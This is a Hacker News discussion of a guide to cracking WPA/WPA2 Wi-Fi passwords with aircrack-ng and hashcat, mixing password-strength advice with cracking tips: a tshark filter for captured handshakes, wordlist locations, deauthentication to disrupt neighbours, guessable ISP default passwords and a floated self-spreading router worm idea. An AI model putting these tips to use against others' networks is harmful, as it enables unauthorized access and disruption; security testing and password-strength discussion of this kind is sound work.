
Crack WPA/WPA2 Wi-Fi Routers with Aircrack-Ng and Hashcat - braxxox
https://github.com/brannondorsey/wifi-cracking
======
throwasehasdwi
I'm not sure why this is amazing enough to make the first page but W/E it's HN
:). Just so less informed are aware, this has been feasible for maybe 7 years
(since GPU calculation became possible).

Just so nobody freaks out, this is cracking weak passwords, not broken WPA.

I have myself cracked countless WiFi passwords when security testing. It's
easy if the passwords are bad, which is maybe 90% of the time for home
networks and 60% for businesses. The attack is completely passive if you don't
want to be noticed, and with a cheap dish you can pickup both ends of the
handshakes from up to around a quarter mile away (line of sight).

~~~
mdeeks
Can someone define what is considered a weak vs strong password now for WiFi?
The only guides I found online are years old.

Is 10 characters considered weak for mixed case letters, numbers, plus
punctuation now?

~~~
rocqua
To do this formally, you need to consider information entropy. This is all
about how you generated your password. 10 characters of totally random mixed
case, numbers and punctuation gives about 60 bits of entropy which is strong
enough.

HOWEVER, that calculation only works if all 10 characters were generated
uniformly and randomly. Humans are terrible at this. Now, maybe your trick for
turning words into safe passwords is great, but there is no way to be sure.
Sadly, remembering 10 random characters is hard.

Luckily, easy to remember and strong passwords are possible. The system I
would recommend is diceware: www.diceware.com

~~~
joshjje
There was a nice comic/picture of this. I tend to follow it. Basically using
3-4 short words as a phrase instead of random characters. You can toss special
characters inbetween/before/after. They are also much easier to remember.
Password "FoolMeOnce!ShameOnMe" for example.

~~~
freeflight
For completeness sake, this is probably the comic you are referencing:
[https://xkcd.com/936/](https://xkcd.com/936/)

~~~
shpx

        curl -s https://raw.githubusercontent.com/first20hours/google-10000-english/master/google-10000-english-no-swears.txt | shuf | head -n 4 | tr '\n' ' '; echo
        mine wear vacation mostly
    

log2(10^16) = 53 bits of entropy or 300 years if your attacker can do a
million guesses per second (the link says 1000 keys per second, but that's on
the CPU).

You could also use `cat /usr/share/dict/words` instead of the `curl`, which is
a much larger word list, but you get impractical passwords like "globular
cellulose's malnutrition's dangling".

~~~
icebraining
Careful, shuf is not cryptographically safe by default! You need to pass
--random-source=/dev/urandom to get a proper RNG.

[https://www.gnu.org/software/coreutils/manual/html_node/Rand...](https://www.gnu.org/software/coreutils/manual/html_node/Random-
sources.html)

~~~
shpx
Why does shuf implement its own random number generator? Why isn't
/dev/urandom the default?

[https://sockpuppet.org/blog/2014/02/25/safely-generate-
rando...](https://sockpuppet.org/blog/2014/02/25/safely-generate-random-
numbers/)

~~~
icebraining
shuf is not a crypto tool, and the GNU coreutils are written to be cross-
platform, even where /dev/urandom doesn't exist, or is unreliable. That's my
guess, at least.

------
aerovistae
I attempted to do this once and it turned out to be monumentally difficult. I
got as far as setting up a bootable kali thumb drive before getting stopped in
my tracks by hardware incompatibilities and unexpected behaviors and errors.
These articles make it sounds a LOT easier than it is. I was very disappointed
because I was really excited about it.

~~~
rxhernandez
I beg to differ. I was doing this at 15 or 16 years old in 2006 when it was
still called backtrack. So long as you had a mainstream laptop, the most
difficult part was buying a compatible wireless card.

To note, the extent of my technical abilities at that time wasn't much beyond
being able to install a mainstream linux distribution or write a simple
program in C.

~~~
maxerickson
Yeah, I used Backtrack to show my brother that his big complex password didn't
mean anything if he was using WEP (this was quite a while ago).

On a pretty standard laptop (intel chipset/CPU/GPU/Wireless) it booted right
up with no effort.

------
polpo
4,733,979 out of the 14,344,391 passwords (33%) in the rockyou.txt dictionary
file used for cracking in this guide are too short to be WPA2 passwords, which
have a minimum length of 8 characters. Are aircrack and/or hashcat smart
enough to not bother hashing those short passwords?

~~~
domenukk
5 million hashes only take a few seconds for wpa2 anyway... Less than two for
this system:
[https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a27...](https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a270c40)

~~~
stusmall
They don't touch it in this tutorial but typically you don't check just whats
in your dictionary. You also use a set of rules to manipulate your dictionary
that massively increases the number of hashes to perform. Those 5 million
entries quickly passes tens of billions hashes that need to be run. These
initial entries might be too short like OP pointed out, but after the rules
are applied it might generate many entries that will be long enough to spend
time hashing.

The keyspace for WPA is huge and the hash speed is still relatively slow, even
with an extremely high end system like you linked to the quality of the
initial dictionary is really important.

------
yedpodtrzitko
Is there anything novel in there? On a first sight it seems just like a guide
done hundred times before...

~~~
IncRnd
Nope. This is an ancient attack.

------
bobsgame
I had the idea a long time ago to make a dd-wrt image which would
automatically crack the vulnerable routers within distance, detect the model,
and install a compatible version of itself in order to spread virally and
create a mesh network. I'm not going to pursue it because it probably breaks a
lot of laws, but I'm still curious if it would have been possible. Does anyone
know if this is actually feasible? Maybe the radios can't handle that sort of
thing?

~~~
pletnes
Did you mean this?

[http://gizmodo.com/264050/slurpr-wi-fi-box-sucks-up-six-
sign...](http://gizmodo.com/264050/slurpr-wi-fi-box-sucks-up-six-signals-for-
super-broadband)

------
thinkxl
wifite2[1] is a wrapper tool that does all this automatically.

Not trying to say that easier is better, in this case. Just wanted to show
this tool for those who don't know it.

[1] - [https://github.com/derv82/wifite2](https://github.com/derv82/wifite2)

edit: added wifite initially, replaced it with wifite2

------
webaholic
To the script kiddies out there who read this: Do not try this on others wifi.
It is a crime in the USA to crack network routers. Although the chance of you
getting caught is low, better be safe than sorry.

~~~
slackingoff2017
It is possible to catch 4 way handshakes completely passively. You're not
hacking into anything, simply observing.

It's not illegal to receive signals on an unlicensed band with stock equipment

~~~
pavel_lishin
> _It 's not illegal to receive signals on an unlicensed band with stock
> equipment_

But my neighbors would still be pretty miffed, and would likely have legal
recourse, if I passively captured their EM emissions in the 390-700nm band
through their bedroom windows at night on a regular basis.

------
buschtoens
The deauthentication packet looks interesting. Does that mean, that I could
annoy the hell out of my neighbors by constantly forcing all of their devices
to reconnect?

------
infamousjoeg
How long does the cracking process take? I remember WEP only taking 10 minutes
using aircrack-ng in BackTrace... I imagine this takes substantially longer.

~~~
rexicus
It's not viable for those random 12-ish digit passwords most ISPs will use.

~~~
Qub3d
Yeah, which is why it is sometimes weirdly _safer_ to not change your SSID - a
cracker can assume that someone who figured out how to change the broadcast
name could've also changed the WiFi password... often to something much less
secure.

~~~
tFXR89qo
SSID is used for password hashing, so better change it from default to avoid
rainbow tables.

------
billfor
Just fyi if you are using Kali the rockyou list is already in
/usr/share/wordlists.

Also to reduce the size of the pcap file, you may want filter it for EAPOL
packets only:

tshark -r input.pacp -R "eapol || wlan.fc.type_subtype == 0x08" -w small.pcap

------
nictrix
The DSL provider in my area sets up customer's wireless networks with their
home or mobile phone number as the password. If you know that number or can
look it up in public records then you're in. If you can't find it maybe use a
dictionary pertaining to the area code of phone numbers and then you're in.
When the protocol changes to something more secure, the ISP's customer will
still be as insecure as they always were.

~~~
c3833174
That's not as bad as deriving password and SSID (Provider-$generated_number)
from the MAC address, it didn't take much for somebody to reverse the
algorithm from the bootloader and make various programs to calculate the few
possible password from SSID

------
nikkwong
Can someone help me understand why, from a technical perspective, it is
necessary to capture the handshake?

~~~
mattfaus
The handshake contains the encrypted password. The idea is to reverse this
encryption to obtain the plaintext password.

------
nextstep
Does this only crack single word passwords? If my password was two common
dictionary words or a common word plus a single number, would this try that
possibility?

~~~
braxxox
Using a wordlist with aircrack-ng seems to only try the literal passwords in
the dictionary. If you use naive-hashcat, a series of dictionary, rule,
combination, and brute-force attacks will be used. I recommend reading up on
the hashcat wiki ([https://hashcat.net/wiki/](https://hashcat.net/wiki/)) to
learn how to conduct your own custom hashing attacks.

------
rootsudo
Honestly, why reinvent the wheel. Use Wifite2 with a proper password list and
done.

~~~
jagermo
the proper password list part really is the challenge.

------
tambourine_man
Anyone tried Apple's Airport drivers and Linux on VirtualBox?

------
baalimago
most people don't change password on their routers anymore

